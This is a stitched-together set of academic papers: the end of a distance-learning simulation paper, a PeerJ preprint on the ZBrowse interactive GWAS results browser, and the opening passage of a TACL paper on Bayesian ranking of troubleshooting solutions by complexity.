for data to cycle until the system closed. V. SIMULATION EXPERIMENT The scale of the personnel simulation is about 480 people (Fig.2), the learners are set to the same request rate (intervalsetting function is negative expo-numberdistribution function),knowledge givers also bears for the same rate interact with learners. A learning subject forms one subnet, the learners interactwithknowledge giver to complete each content of the study, the learners may be as learners involved in the other subject learning subnet, a large number of this is nested. Figure 2. Modeling of simulated network level We can see from the diagram that knowledge giver under the theme interact with a large number of students, and the learners complete the knowledge content learning. From the figure 3, we can see that the improvement of the new model reflects the active learning behavior of learners. When the model adopting the dynamic autonomous learning, learners in sending interactive data clearly in dynamic changes (as shown in figure 4). Can be seen from the figure b, learners after receiving the grantor knowledge content, knowledge acquisition of related request change significantly, the interesting thing is the simulation data curve downward point is far lower than the original model of rate, this should be thatthe increase of the initiative will also reduce the interest in learning theme. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 38 Figure 3. Learners average interactive rate (a)Knowledge acquisition rate (b)Knowledge acquisition request rate Figure 4. learners sending interactive data in dynamic changes From the above two groups of simulation data, we can see that the improvement of the new model not only reflects the active learning behavior of learners, but also increase the degree to which are not interested in learning content. VI. CONCLUSION The modern distance learning is bestowed with knowledge individuals, related to personal participation and learning knower. The enthusiasm of the individual, personal exploration, personal opinions are indispensable part of the knowledge. Knowledge itself is the intrinsic personal factors, the knowledge acquisition process is the knower individuals involved in the process of knowledge construction. Dewey explains the participants knowledge view as "interaction" of the human and the environment. Distance learning requires interactivity and initiative to improve, to achieve their aptitude, use now study in a variety of formats data, learners to master the initiative in the learning process, it is not easy to lead to deviation from the learning goals. To this end, on the basis of THLMT theory and distributed interactive technology, the introduction of active learning factors, put forward a kind of active learning rules of interaction, the interaction between learners and knowledge imparter is studied, under the condition of active learning, completely control rules generated by interactive knowledge subject data with method of study, established a model of autonomous learning. The model not only focus on learners "through" process, more emphasis on the learner in the experience, get personalized understanding in learning enthusiasm. This way of learning value is that learners in "facing the complex itself" keep some kind of "seek" uncertainty, in the process of "certainty for" construction "personal knowledge", in the process of "seeking" uncertainty "eagerly seeking knowledge", and will set up the learning process in the simulation software, in order to dynamically determine the distance learning program and related learning strategy, really improve the intelligent and personalized distance learning. ACKNOWLEDGMENT This research was supported by the industrial research project of Shaanxi science and technology department (nos.2016GY-088) and the educational reform fund of Xi'an 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 39 Technological University (nos. 15JGZ05, 16JGY25, XAGDYJ160208). REFERENCES [1] Lee B, Yoon J,and Lee I,“Learners’ acceptance of e-learning in South Korea: Theories and results,” Computers & Education. 53rd ed,vol.3, 2009,pp.1320–1329. [2] Ahmed H M S. “Hybrid E-Learning Acceptance Model: Learner Perceptions,” Decision Sciences the Journal of Innovative Education. 8th ed,vol.2, 2010,pp.313–346. [3] Ikpeze C H,and Boyd F B. “Web-Based Inquiry Learning: Facilitating Thoughtful Literacy with WebQuests,” Reading Teacher. 60th ed,vol.7, 2007,pp.644–654. [4] Maudsley G, Williams E M I, and Taylor D C M. “Problem-based learning at the receiving end: A ‘mixed methods’ study of junior medical students’ perspectives,”Advances in Health Sciences Education. 13th ed,vol.4, 2008,pp.435-451. [5] Yun L X, sheng Z Y, and li Z S. “Intelligent Internet long-distance teaching model based on knowledge,”Journal of Hefei University of Technology. 2003,pp.514-519. [6] English T, Harrison A L, and Hart A L. “A Distance Learning Model in a Physical Therapy Curriculum,” Journal of Allied Health.1998, pp.27. [7] Jenkins J R P C G J M. “Special education and the regular education initiative: basic assumptions,” Exceptional Children. 56th ed,vol.6, 1990,pp.479-491. [8] Harjumaa M, and Oinas-Kukkonen H. “TowardsDeeper Understanding of Persuasion in Software and Information Systems,” International Conference on Advances in Computer-human Interaction. IEEE Computer Society, 2008, pp.200-205. [9] Gellman-Danley B, and Fetzner M J. “Asking the really tough questions: Policy issues for distance learning.”Online Journal of Distance Learning Administration . 1998,pp.49-54 [10] Qing P, Yun X, and Shou-hong W.“Research and Implementation of Animation Technology on Distance Teaching Courseware,” Application Research of Computers. 21st ed,vol.2, 2004,pp.144-146. [11] Boyle T. “Design principles for authoring dynamic reusable learning objects,” Australian Journal of Educational Technology. 19th ed,vol.1, 2003,pp.46--58. work_3q27dttkvbgtlcjxliqljpouve ---- Zbrowse: an interactive GWAS results browser A peer-reviewed version of this preprint was published in PeerJ on 27 May 2015. View the peer-reviewed version (peerj.com/articles/cs-3), which is the preferred citable publication unless you specifically need to cite this preprint. Ziegler GR, Hartsock RH, Baxter I. 2015. Zbrowse: an interactive GWAS results browser. PeerJ Computer Science 1:e3 https://doi.org/10.7717/peerj-cs.3 https://doi.org/10.7717/peerj-cs.3 https://doi.org/10.7717/peerj-cs.3 Zbrowse: an interactive GWAS results browser Greg R Ziegler, Ryan H Hartsock, Ivan Baxter The growing number of genotyped populations, the advent of high-throughput phenotyping techniques and the development of GWAS analysis software has rapidly accelerated the number of GWAS experimental results. Candidate gene discovery from these results files is often tedious, involving many manual steps searching for genes in windows around a significant SNP. This problem rapidly becomes more complex when an analyst wishes to compare multiple GWAS studies for pleiotropic or environment specific effects. To this end, we have developed a fast and intuitive interactive browser for the viewing of GWAS results with a focus on an ability to compare results across multiple traits or experiments. The software can easily be run on a desktop computer with software that bioinformaticians are likely already familiar with. Additionally, the software can be hosted or embedded on a server for easy access by anyone with a modern web browser. PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.902v1 | CC-BY 4.0 Open Access | rec: 17 Mar 2015, publ: 17 Mar 2015 P re P ri n ts Greg R Ziegler greg.ziegler@ars.usda.gov United States Department of Agriculture Agricultural Research Service St. Louis, Missouri, United States Ryan H Hartsock rhartsock423@gmail.com Donald Danforth Plant Science Center, St. Louis, Missouri, United States Ivan Baxter ivan.baxter@ars.usda.gov United States Department of Agriculture Agricultural Research Service St. Louis, Missouri, United States CORRESPONDING AUTHOR Ivan Baxter 975 N Warson Rd, St. Louis, MO 63132 (314) 5871438 ivan.baxter@ars.usda.gov PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.902v1 | CC-BY 4.0 Open Access | rec: 17 Mar 2015, publ: 17 Mar 2015 P re P ri n ts mailto:ivan.baxter@ars.usda.gov mailto:ivan.baxter@ars.usda.gov Introduction The recent development of highthroughput plant phenotyping techniques coupled with the ability to genotype large populations of diverse individuals has revolution ized the way that forward genetics research is performed. Tools have rapidly become available to perform genomewide association studies (GWAS) in a variety of species (Kang et al., 2010; Segura et al., 2012; Lipka et al., 2012) that can map traits to the genome with high enough resolution to quickly provide a tractable list of potential causal genes. One of the first steps an analyst will take is determining what gene or genes fall under the SNP peaks that can be seen on the Manhattan plot. Unfortunately, these plots are not interactive and identifying the peaks of interest usually involves sifting through the results table for the coordinates of the peak of interest and then filtering a large gene annotation file for a range around the coordinates of the peak. The extra steps involved in exploring the data in this way makes it more likely that interesting asso citations may be missed either due to 1) mistakes made in attempting to mine the large results files or 2) the dataset not being mined deeply enough due to the difficulty of look ing for genes under less significant peaks. Additionally, this method quickly becomes tedious when analyzing multiple phenotypes or relatively complex traits. Some web applications provide tools for viewing Manhattan plots interactively, but they are all either specific to a single species (Childs, Lisec & Walther, 2012; Li, Sham & Wang, 2012; Seren et al., 2012) or are part of larger software suites that make fast and straightforward viewing of GWAS results difficult (Stein et al., 2002). These resources also do not allow for easy viewing and comparison of GWAS results across phenotypes and studies, a situation that frequently arises with structured populations. Goals We approached the construction of a new GWAS browser with the goal of giving the users the following tools, all of which were focused on versatility and adaptability: 1. Ability to plot multiple traits in the same panel. We wanted to enable users to find genotypeenvironment (GxE) interactions (e.g., those instances where an environmental condition causes a phenotypic effect, but only for individuals with a PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.902v1 | CC-BY 4.0 Open Access | rec: 17 Mar 2015, publ: 17 Mar 2015 P re P ri n ts given allele) and loci with pleiotropic effects (the same loci affecting multiple phenotypes).. 2. Ability to rapidly move between scales (thousands of bps to billions). 3. Ability to to find overlaps or commonalities among sets. 4. Ability to interact directly with the plots. We wanted the ability to look at the annotations of genes inline easily and link to additional information. 5. Ability to download plots and gene lists. 6. Finally, we wanted all of this information and functionality to be available in one browser window using tools that are common and freely available to the community. Here, we present an interactive GWAS results viewer that is an extension of the classic GWAS Manhattan plot. It allows for the rapid comparison of GWAS results from multiple phenotyping experiments and the rapid viewing and analysis of genes under peak SNPs. Arabidopsis thaliana, maize, soybean, and sorghum are bundled with the software but we provide instructions and tools to easily add support for other organisms. User Interface The ZBrowse GWAS results viewer is an interactive application that runs on a local machine using R and is rendered in any modern web browser. Because the browser runs on the users local machine, the data will remain private. The focus of the first version is a local installation, the browser display allows for easy sharing of the application. The browser is designed to be a streamlined environment that provides fast access to visualization tools to allow the quick analysis of GWAS results. ZBrowse utilizes a tabbased navigation format to make accessing different aspects of the browser fast, efficient, and intuitive. There is also a sidebar panel on the left of the page that updates with a set of options specific to the tab being displayed. The first tab in the list, and the landing page when the application is first loaded, is the Manage tab (Figure 1). This tab allows a new GWAS dataset to be uploaded into the application or a preloaded dataset from a dropdown menu can be selected. Before uploading, the user selects the appropriate organism from a dropdown menu. Data can be uploaded in a flat file delimited with either commas or tabs or an RData object. Once uploaded, a preview of the first ten rows of the dataset will appear in the main panel. Below this table is a series of selection boxes that allow the user to specify PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.902v1 | CC-BY 4.0 Open Access | rec: 17 Mar 2015, publ: 17 Mar 2015 P re P ri n ts which columns in the file to use for plotting. The user needs to select a chromosome and base pair for determining the location of each SNP in the genome. If the uploaded dataset is data from only one GWAS trait, there is a checkbox to include all data as one trait. Otherwise, the user can select one or more trait columns to group the data by when plotting. For example, a researcher might be interested in comparing GWAS results from multiple experiments, or in comparing results from multiple traits measured in the same experiment, or both. The user simply needs to select the column or columns with the label for the trait that the SNP corresponds to. Finally, the user needs to select the yaxis column with the significance value against which to plot each SNP. Usually, this is the negative logarithm of the Pvalue, but can also be the number of bootstrap models that include this SNP (RMIP, Valdar et al., 2009) or any other measure of trait significance, such as effect size. The final parameter allows for user selectable values for the Yaxis scale. By default, the software will automatically scale the yaxis based on the range of the selected data. After the user has selected the appropriate parameters, clicking the submit but ton will trigger a tab change to the Whole Genome View visualization tab (Figure 2). Conveniently, once submitted, the software will remember the selected settings for this dataset on future visits and automatically populate the fields with the previ ously selected parameters. The plot on this tab is formatted as a standard genomewide Manhattan plot. The xaxis is ordered by chromosome and base pair within each chromosome. The background of the plot has alternating blue/white shading for the even and odd chromosomes to highlight chromosome breaks. The panel on the left contains a box for each trait column selected in the Manage tab. Each of these boxes is populated with the values found in that column and any combination of one to many traits can be selected for viewing on the plot on the right. There is also an option for showing only overlapping SNPs with the ability to adjust both the overlap size around each point and the minimum number of overlaps. When the user scrolls over points in the plot, a tooltip will display that shows information about the trait that SNP is associated with, the Yaxis value, and the exact chromosome and base pair for the SNP (Figure 3). If the tooltip gets in the way of the viewing or selecting of points, clicking the plot will temporarily hide the tooltip box. Clicking any point in the Whole Genome View will change tabs to the Chromosome View tab (Figure 4). This tab contains two plots: one is a chromosomewide view displaying the data from the chromosome clicked in the genomewide view, the other PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.902v1 | CC-BY 4.0 Open Access | rec: 17 Mar 2015, publ: 17 Mar 2015 P re P ri n ts plot is an annotation plot of the region around the clicked base pair. A blue band in the chromosomewide plot highlights the region being displayed in the annotation plot. The plot contains a variety of interactive features. In addition to selecting traits to view in the sidebar panel, traits can be quickly hidden by clicking their entry in the legend. When many points are plotted on the same graph, overplotting can make it difficult to discern points clustered around the same peak. To alleviate this, the plot can be easily zoomed by clicking and dragging a zoom box anywhere in the plot. This makes it much easier to see the relationship between tightly grouped points. The displayed chromosome can be changed without returning to the Whole Genome View tab using the dropdown menu in the sidebar panel. Points can be clicked to redraw the annotation plot around new points of interest. The annotation plot is a variable width plot that defaults to showing the region 250,000 base pairs on either side of the point of interest. The width of this region can be adjusted between 1,000 and 500,000 base pairs using the slider on the sidebar panel. The bottom of this plot has a track that shows the position of coding sequences around the SNP of interest. The tooltip for genes in this track displays information about the gene location, strand, and function, if known. For maize, arabidopsis and soybean, clicking on the gene will open a new browser tab that links to the gene description page specific to the organism being viewed. Arabidopsis links to The Arabidopsis Information Resource(TAIR) (Lamesch et al., 2011), soybean links to Soybase (Grant et al., 2010), and maize links to the Maize Genetics and Genomics Database (MaizeGDB) (Lawrence et al., 2004). In addition, clicking genes in organisms added from Phytozome (Goodstein et al., 2012) via the add organism application described below opens the Phytozome description page for that gene. ZBrowse can be easily modified to link out to other speciesspecific databases that can accept a query string in the URL. In addition to the visual browser, annotation data can be explored in tabular form in the Annotation Table tab (Figure 5). This table provides an interactive table of the genes found in the window around the selected point. The table is sortable and searchable and can also be exported as a commaseparated file. A similar table viewer is available in the Data Table tab for analysis of the selected GWAS dataset. Adding Organisms PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.902v1 | CC-BY 4.0 Open Access | rec: 17 Mar 2015, publ: 17 Mar 2015 P re P ri n ts Currently, maize, soybean, arabidopsis and sorghum are downloaded with the browser source package. We have developed an application to quickly add organisms to the browser from annotations downloaded from the Plant Genomics Portal (Phytozome) to the local installation of ZBrowse. Additionally, we will be formatting requested and popular organisms and releasing the files on GitHub. These will be easy to download and incorporate into your existing browser installation. Technical Foundation The GWAS browser is written in the R programming language using packages that provide wrappers around popular javascript web applications including shiny (RStudio Inc., 2013) and rCharts (Vaidyanathan, 2013). Because of this, the browser can be run locally with only R and any modern web browser. Internal data processing makes use of the plyr package (Wickham, 2011). The javascript plots are drawn using Highcharts (highcharts.com) and are available for use under the Creative Commons AttributionNonCommercial 3.0 License. Tables are generated using the javascript library Datatables (datatables.net) and xtable (Dahl, 2013). All of the tools and software used are either free or open source. The use of R to build the web application makes it more easily accessible to bioinformaticians to extend than if it was written in pure javascript. Many GWAS programs are written in R (Kang et al., 2008; Segura et al., 2012; Lipka et al., 2012). So, many scientists performing GWAS will already have some familiarity with R constructs, even if they are not computational biologists. This familiarity will hopefully make it easier for the community who is using the browser to extend it and modify it for their purposes. Limitations The browser takes a fundamentally different approach from current state of the art browsers. It is focused on the ability to quickly plot a variety of GWAS experiments on a single Manhattan plot. A caveat to this ability, however, is that it cannot plot every SNP in a genotype dataset. Due to memory, time, and plotting constraints the current browser is limited to approximately 5000 data points per trait, which is significantly less than most genotype datasets. Of course, only the most strongly associated SNPs are typically of interest, so this problem can be easily mitigated by trimming the input file to contain only significant associations (e.g., p<0.05). Future improvements to the browser could support the plotting of more information by binning points when zoomed out to a point where over plotting is an issue and PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.902v1 | CC-BY 4.0 Open Access | rec: 17 Mar 2015, publ: 17 Mar 2015 P re P ri n ts only loading individual data points asynchronously when the zoom level is sufficient to see individual points. The generality of the browser allows for it to be used with any SNP dataset. Only chromosome number and base pair information needs to be provided for each SNP. However, this means that specific information about the genotype dataset being used, such as minor allele frequency or linkage disequilibrium information, cannot be displayed on the plot. Of course, the flexibility of the browser would make it easy to build personalized solutions that could display additional information for specific SNP datasets and additional tracks could be added to display linkage disequilibrium decay around the selected SNP. One obvious extension of the browser that would address many of the limitations listed above would be to connect it to a database designed to quickly and efficiently handle all of the data that goes into a GWAS experiment. Database support would allow custom subsetting of entire GWAS datasets and if the GWAS genotype files are available, then summary data about each particular SNP could also be displayed. This would allow the browser to be incorporated into a much larger ecosystem that could take a GWAS experiment from phenotypic dataset, through running a GWAS experiment, to final analysis and visualization. While the limitations identified above may constrain the use of the browser for certain applications, there are a number of use cases that are enabled by its current functionality. Using open source tools and GitHub for the code distribution, the browser functionalities can be enhanced by the authors or by other members of the user community. Available resources: Download at: http://www.baxterlab.org/#!/cqi0 Code is also available on github at https://github.com/baxterlabZbrowse/ZBrowse manual can be found here: http://media.wix.com/ugd/52737a_2a65d0deb3bd4da2b5c0190c0de343ca.pdf For support email: baxterlabZbrowse@danforthcenter.org PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.902v1 | CC-BY 4.0 Open Access | rec: 17 Mar 2015, publ: 17 Mar 2015 P re P ri n ts References Childs LH, Lisec J, Walther D. 2012. Matapax: An Online HighThroughput GenomeWide Association Study Pipeline. Plant Physiology 158:1534–1541. Dahl DB. 2013. xtable: Export tables to LaTeX or HTML. Goodstein DM, Shu S, Howson R, Neupane R, Hayes RD, Fazo J, Mitros T, Dirks W, Hellsten U, Putnam N, Rokhsar DS. 2012. Phytozome: a comparative platform for green plant genomics. Nucleic Acids Research 40:D1178–D1186. Grant D, Nelson RT, Cannon SB, Shoemaker RC. 2010. SoyBase, the USDAARS soybean genetics and genomics database. Nucleic Acids Research 38:D843–D846. Kang HM, Zaitlen NA, Wade CM, Kirby A, Heckerman D, Daly MJ, Eskin E. 2008. Efficient Control of Population Structure in Model Organism Association Mapping. Genetics 178:1709–1723. Kang HM, Sul JH, Service SK, Zaitlen NA, Kong S, Freimer NB, Sabatti C, Eskin E. 2010. Variance component model to account for sample structure in genomewide association studies. Nature Genetics 42:348–354. Lamesch P, Berardini TZ, Li D, Swarbreck D, Wilks C, Sasidharan R, Muller R, Dreher K, Alexander DL, GarciaHernandez M, Karthikeyan AS, Lee CH, Nelson WD, Ploetz L, Singh S, Wensel A, Huala E. 2011. The Arabidopsis Information Resource (TAIR): improved gene annotation and new tools. Nucleic Acids Research 40:D1202–D1210. Lawrence CJ, Dong Q, Polacco ML, Seigfried TE, Brendel V. 2004. MaizeGDB, the community database for maize genetics and genomics. Nucleic Acids Research 32:D393–D397. PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.902v1 | CC-BY 4.0 Open Access | rec: 17 Mar 2015, publ: 17 Mar 2015 P re P ri n ts Lipka AE, Tian F, Wang Q, Peiffer J, Li M, Bradbury PJ, Gore MA, Buckler ES, Zhang Z. 2012. GAPIT: genome association and prediction integrated tool. Bioinformatics 28:2397–2399. Li MJ, Sham PC, Wang J. 2012. Genetic variant representation, annotation and prioritization in the postGWAS era. Cell Research 22:1505–1508. RStudio Inc. 2013. shiny: Web Application Framework for R. Segura V, Vilhjálmsson BJ, Platt A, Korte A, Seren Ü, Long Q, Nordborg M. 2012. An efficient multilocus mixedmodel approach for genomewide association studies in structured populations. Nature Genetics 44:825–830. Seren Ü, Vilhjálmsson BJ, Horton MW, Meng D, Forai P, Huang YS, Long Q, Segura V, Nordborg M. 2012. GWAPP: A Web Application for GenomeWide Association Mapping in Arabidopsis. The Plant Cell Online:tpc.112.108068. Stein LD, Mungall C, Shu S, Caudy M, Mangone M, Day A, Nickerson E, Stajich JE, Harris TW, Arva A, Lewis S. 2002. The Generic Genome Browser: A Building Block for a Model Organism System Database. Genome Research 12:1599–1610. Vaidyanathan R. 2013. rCharts: Interactive Charts using Polycharts.js. Valdar W, Holmes CC, Mott R, Flint J. 2009. Mapping in Structured Populations by Resample Model Averaging. Genetics 182:1263–1277. Wickham H. 2011. The SplitApplyCombine Strategy for Data Analysis. Journal of Statistical Software 40:1–29. PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.902v1 | CC-BY 4.0 Open Access | rec: 17 Mar 2015, publ: 17 Mar 2015 P re P ri n ts Fig. 1. Landing page for Interactive GWAS Results Browser. PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.902v1 | CC-BY 4.0 Open Access | rec: 17 Mar 2015, publ: 17 Mar 2015 P re P ri n ts Fig. 2. Genome wide view of Interactive GWAS Results Browser. The legend at the bottom of the figure displays the color of points that correspond to the combination of traits and locations selected in the sidebar on the left hand side of the figure. Clicking the points in the legend allows a user to easily show or hide points from that trait. modIncProb=Random Model Inclusion Probability, RMIP, the fraction of times each SNP displayed was returned out of 100 GWAS analyses performed on a random subset of 80% of the data. The title of the plot is automatically generated from the filename of the dataset provided by the user. This makes it easy to determine which GWAS experiment is being plotted. Base Pairs = base position along the chromosome. PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.902v1 | CC-BY 4.0 Open Access | rec: 17 Mar 2015, publ: 17 Mar 2015 P re P ri n ts Fig. 3. Example of tooltip displaying top SNP for Trait 1 in a Maize NAM GWAS experiment. The legend at the bottom of the figure displays the color of points that correspond to the combination of traits and locations selected in the sidebar on the left hand side of the figure. Clicking the points in the legend allows easily show or hide points from that trait. modIncProb=Random Model Inclusion Probability, RMIP, the fraction of times each SNP displayed was returned out of 100 GWAS analyses performed on a random subset of 80% of the data. The title of the plot is automatically generated from the filename of the file provided by the user. This makes it easy to determine which GWAS experiment is being plotted. PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.902v1 | CC-BY 4.0 Open Access | rec: 17 Mar 2015, publ: 17 Mar 2015 P re P ri n ts Fig. 4. Chromosome View tab of the Interactive GWAS Results Browser displaying a peak above the ion transporter. The legend at the bottom of the figure displays the color of points that correspond to the combination of traits and locations selected in the sidebar on the left hand side of the figure. Clicking the points in the legend allows a user to easily show or hide points from that trait. modIncProb=Random Model Inclusion Probability, RMIP, the fraction of times each SNP displayed was returned out of 100 GWAS analyses performed on a random subset of 80% of the data. The title of the plot is automatically generated from the filename of the dataset provided by the user. This makes it easy to determine which GWAS experiment is being plotted. Base Pairs = base position along the chromosome. PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.902v1 | CC-BY 4.0 Open Access | rec: 17 Mar 2015, publ: 17 Mar 2015 P re P ri n ts Fig. 5. Annotation tab of the Interactive GWAS Results Browser. PeerJ PrePrints | https://dx.doi.org/10.7287/peerj.preprints.902v1 | CC-BY 4.0 Open Access | rec: 17 Mar 2015, publ: 17 Mar 2015 P re P ri n ts work_3q7djukk75c2zkcpzjfjnkd7xu ---- Edinburgh Research Explorer Which Step Do I Take First? Troubleshooting with Bayesian Models Citation for published version: Louis, A & Lapata, M 2015, 'Which Step Do I Take First? Troubleshooting with Bayesian Models', Transactions of the Association for Computational Linguistics, vol. 3, pp. 73-85. Link: Link to publication record in Edinburgh Research Explorer Document Version: Publisher's PDF, also known as Version of record Published In: Transactions of the Association for Computational Linguistics General rights Copyright for the publications made accessible via the Edinburgh Research Explorer is retained by the author(s) and / or other copyright owners and it is a condition of accessing these publications that users recognise and abide by the legal requirements associated with these rights. Take down policy The University of Edinburgh has made every reasonable effort to ensure that Edinburgh Research Explorer content complies with UK legislation. If you believe that the public display of this file breaches copyright please contact openaccess@ed.ac.uk providing details, and we will remove access to the work immediately and investigate your claim. Download date: 06. Apr. 2021 https://tacl2013.cs.columbia.edu/ojs/index.php/tacl/article/view/440 https://www.research.ed.ac.uk/portal/en/publications/which-step-do-i-take-first-troubleshooting-with-bayesian-models(974f3fac-919b-4635-ab52-3d9e30a25c0d).html Which Step Do I Take First? Troubleshooting with Bayesian Models Annie Louis and Mirella Lapata School of Informatics, University of Edinburgh 10 Crichton Street, Edinburgh EH8 9AB {alouis,mlap}@inf.ed.ac.uk Abstract Online discussion forums and community question-answering websites provide one of the primary avenues for online users to share information. In this paper, we propose text mining techniques which aid users navigate troubleshooting-oriented data such as ques- tions asked on forums and their suggested so- lutions. We introduce Bayesian generative models of the troubleshooting data and apply them to two interrelated tasks: (a) predicting the complexity of the solutions (e.g., plugging a keyboard in the computer is easier compared to installing a special driver) and (b) present- ing them in a ranked order from least to most complex. Experimental results show that our models are on par with human performance on these tasks, while outperforming baselines based on solution length or readability. 1 Introduction Online forums and discussion boards have created novel ways for discovering, sharing, and distribut- ing information. Users typically post their ques- tions or problems and obtain possible solutions from other users. Through this simple mechanism of community-based question answering, it is possible to find answers to personal, open-ended, or highly specialized questions. However, navigating the in- formation available in web-archived data can be challenging given the lack of appropriate search and browsing facilities. Table 1 shows examples typical of the problems and proposed solutions found in troubleshooting- oriented online forums. The first problem concerns a shaky monitor and has three solutions with increas- ing degrees of complexity. Solution (1) is probably easiest to implement in terms of user time, effort, and expertise; solution (3) is most complex (i.e., the user should understand what signal timing is and The screen is shaking. 1. Move all objects that emit a magnetic field, such as a motor or transformer, away from the monitor. 2. Check if the specified voltage is applied. 3. Check if the signal timing of the computer system is within the specification of the monitor. “Illegal Operation has Occurred” error message is displayed. 1. Software being used is not Microsoft-certified for your version of Windows. Verify that the software is certified by Microsoft for your version of Windows (see program packaging for this information). 2. Configuration files are corrupt. If possible, save all data, close all programs, and restart the computer. Table 1: Example problems and solutions taken from on- line troubleshooting oriented forums. then try to establish whether it is within the specifi- cation of the monitor), whereas solution (2) is some- where in between. In most cases, the solutions are not organized in any particular fashion, neither in terms of content nor complexity. In this paper, we present models to automatically predict the complexity of troubleshooting solutions, which we argue could improve user experience, and potentially help solve the problem faster (e.g., by prioritizing easier solutions). Automatically struc- turing solutions according to complexity could also facilitate search through large archives of solutions or serve as a summarization tool. From a linguis- tic perspective, learning how complexity is verbal- ized can be viewed as an instance of grounded lan- guage acquisition. Solutions direct users to carry out certain actions (e.g., on their computers or de- vices) and complexity is an attribute of these ac- tions. Information access systems incorporating a notion of complexity would allow to take user in- tentions into account and how these translate into natural language. Current summarization and infor- mation retrieval methods are agnostic of such types of text semantics. Moreover, the models presented here could be used for analyzing collaborative prob- 73 Transactions of the Association for Computational Linguistics, vol. 3, pp. 73–85, 2015. Action Editor: Eric Fosler-Lussier. Submission batch: 9/2014; Revision batch 1/2015; Published 2/2015. c©2015 Association for Computational Linguistics. lem solving and its social networks. Characterizing the content of discussion forums by their complexity can provide additional cues for identifying user au- thority and if there is a need for expert intervention. We begin by validating that the task is indeed meaningful and that humans perceive varying de- grees of complexity when reading troubleshooting solutions. We also show experimentally that users agree in their intuitions about the relative complex- ity of different solutions to the same problem. We define “complexity” as an aggregate notion of the time, expertise, and money required to implement a solution. We next model the complexity predic- tion task, following a Bayesian approach. Specifi- cally, we learn to assign complexity levels to solu- tions based on their linguistic makeup. We leverage weak supervision in the form of lists of solutions (to different problems) approximately ordered from low to high complexity (see Table 1). We assume that the data is generated from a fixed number of dis- crete complexity levels. Each level has a probability distribution over the vocabulary and there is a canon- ical ordering between levels indicating their relative complexity. During inference, we recover the vo- cabularies of the complexity levels and the ordering of levels that explains the solutions and their attested sequences in the training data. We explore two Bayesian models differing in how they learn an ordering among complexity levels. The first model is local, it assigns an expected position (in any list of solutions) to each complexity level and orders the levels based on this expected posi- tion value. The second model is global, it defines probabilities over permutations of complexity lev- els and directly uncovers a consensus ordering from the training data. We evaluate our models on a so- lution ordering task, where the goal is to rank so- lutions from least to most complex. We show that a supervised ranking approach using features based on the predictions of our generative models is on par with human performance on this task while outper- forming competitive baselines based on length and readability of the solution text. 2 Related work There is a long tradition of research on decision- theoretic troubleshooting where the aim is to find a cost efficient repair strategy for a malfunction- ing device (Heckerman et al., 1995). Typically, a diagnostic procedure (i.e., a planner) is developed that determines the next best troubleshooting step by estimating the expected cost of repair for various plans. Costs are specified by domain experts and are usually defined in terms of time and/or money in- curred by carrying out a particular repair action. Our notion of complexity is conceptually similar to the cost of an action, however we learn to predict com- plexity levels rather than calibrate them manually. Also note that our troubleshooting task is not device specific. Our models learn from troubleshooting- oriented data without any restrictions on the prob- lems being solved. Previous work on web-based user support has mostly focused on thread analysis. The idea is to model the content structure of forum threads by an- alyzing the requests for information and suggested solutions in the thread data (Wang et al., 2011; Kim et al., 2010). Examples of such analysis include identifying which earlier post(s) a given post re- sponds to and in what manner (e.g., is it a question, an answer or a confirmation). Other related work (Lui and Baldwin, 2009) identifies user characteris- tics in such data, i.e., whether users express them- selves clearly, whether they are technically knowl- edgeable, and so on. Although our work does not address threaded discourse, we analyze the content of troubleshooting data and show that it is possible to predict the complexity levels for suggested solu- tions from surface lexical cues. Our work bears some relation to language ground- ing, the problem of extracting representations of the meaning of natural language tied to the physical world. Mapping instructions to executable actions is an instance of language grounding with applica- tions to automated troubleshooting (Branavan et al., 2009; Eisenstein et al., 2009), navigation (Vogel and Jurafsky, 2010), and game-playing (Branavan et al., 2011). In our work, there is no direct attempt to model the environment or the troubleshooting steps. Rather, we study the language of instructions and how it correlates with the complexity of the implied actions. Our results show that it possible to predict complexity, while being agnostic about the seman- tics of the domain or the effect of the instructions in the corresponding environment. Our generative models are trained on existing archives of problems with corresponding solutions (approximately ordered from least to most complex) 74 and learn to predict an ordering for new sets of so- lutions. This setup is related to previous studies on information ordering where the aim is to learn statistical patterns of document structure which can be then used to order new sentences or paragraphs in a coherent manner. Some approaches approxi- mate the structure of a document via topic and entity sequences using local dependencies such as condi- tional probabilities (Lapata, 2003; Barzilay and La- pata, 2008) or Hidden Markov Models (Barzilay and Lee, 2004). More recently, global approaches which directly model the permutations of topics in the doc- ument have been proposed (Chen et al., 2009b). Fol- lowing this line of work, one of our models uses the Generalized Mallows Model (Fligner and Ver- ducci, 1986) in its generative process which allows to model permutations of complexity levels in the training data. 3 Problem formulation Our aim in this work is to learn models which can automatically reorder solutions to a problem from low to high complexity. Let G = (c1, c2, .. cN ) be a collection of solutions to a specific problem. We wish to output a list G′ = (c′1, c ′ 2, .. c ′ N ), such that D(c′j) ≤D(c′j+1), where D(x) refers to the com- plexity of solution x. 3.1 Corpus Collection As training data we are given problem-solution sets similar to the examples in Table 1 where the solu- tions are approximately ordered from low to high complexity. A solution set Si is specific to prob- lem Pi, and contains an ordered list of NPi solu- tions Si = (x1, x2, . . . , xNPi ) such that D(xj) < D(xj+1). We refer to the number of solutions re- lated to a problem, NPi , as its solution set size. For our experiments, we collected 300 problems1 and their solutions from multiple web sites includ- ing the computing support pages of Microsoft, Ap- ple, HP, as well as amateur computer help websites such as www.computerhope.com. The prob- lems were mostly frequently asked questions (FAQs) referring to malfunctioning personal computers and smart phones. The solutions were provided by com- puter experts or experienced users in the absence 1The corpus can be downloaded from http: //www.homepages.inf.ed.ac.uk/alouis/ solutionComplexity.html. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 Solution set size 